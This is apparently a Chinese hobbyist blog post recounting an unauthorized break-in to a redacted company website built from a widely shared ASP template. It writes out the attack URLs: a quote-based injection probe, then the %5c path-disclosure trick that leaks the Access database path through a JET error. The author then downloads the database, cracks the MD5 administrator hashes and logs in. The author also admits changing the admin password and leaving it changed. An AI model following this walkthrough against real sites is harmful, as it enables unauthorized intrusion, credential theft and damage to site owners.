最近正好看到一海门网站，鉴于爱好进行测试了结果令人惊讶。

某网站：www.XXX.com

分析一下：是用ASP制作的，这个页面咋这么熟悉？哦，原因用了网上流传的一个企业ASP源码。先不管这些，从最基本的开始先。

看见其新闻地址：http://www.XXXX.com/XXXX/shownews.asp?news_id=91&cat_id=1

哈哈，我们先试一下这个，输入：http://www.XXXX.com/XXXX/shownews.asp?news_id=91&cat_id==1'

结果是和刚才一下，哈，这个正常啦。

再看一下%5c漏洞先，输入：http://www.XXXX.com/XXXX%5cshownews.asp?news_id=91&cat_id=1

结果发现了漏洞，屏幕显示：

Microsoft JET Database Engine 错误 '80004005'

找不到文件 'D:\1\XXXXX\XXXXX.asp'。

/XXXX/conn.asp，行4

哈，说明一下，那个XXXXX.asp就是那个网站的数据库了，直接用下载工具下载。

将XXXXX.asp改为.mdb格式，查看一下，发现有4个帐户，不过密码都是MD5加密的，咋破解一下先：

结果更让人吃惊：5秒就显示密码明文，马上登录。哈（以后的以后咋就不说了)。

最后申明一下：本文技术含量低，就这么一个漏洞居然还有发生的，真是郁闷，不知道那些服务器网管都干啥吃滴。本人因不小心改了管理员的密码，很抱歉，无法还原了。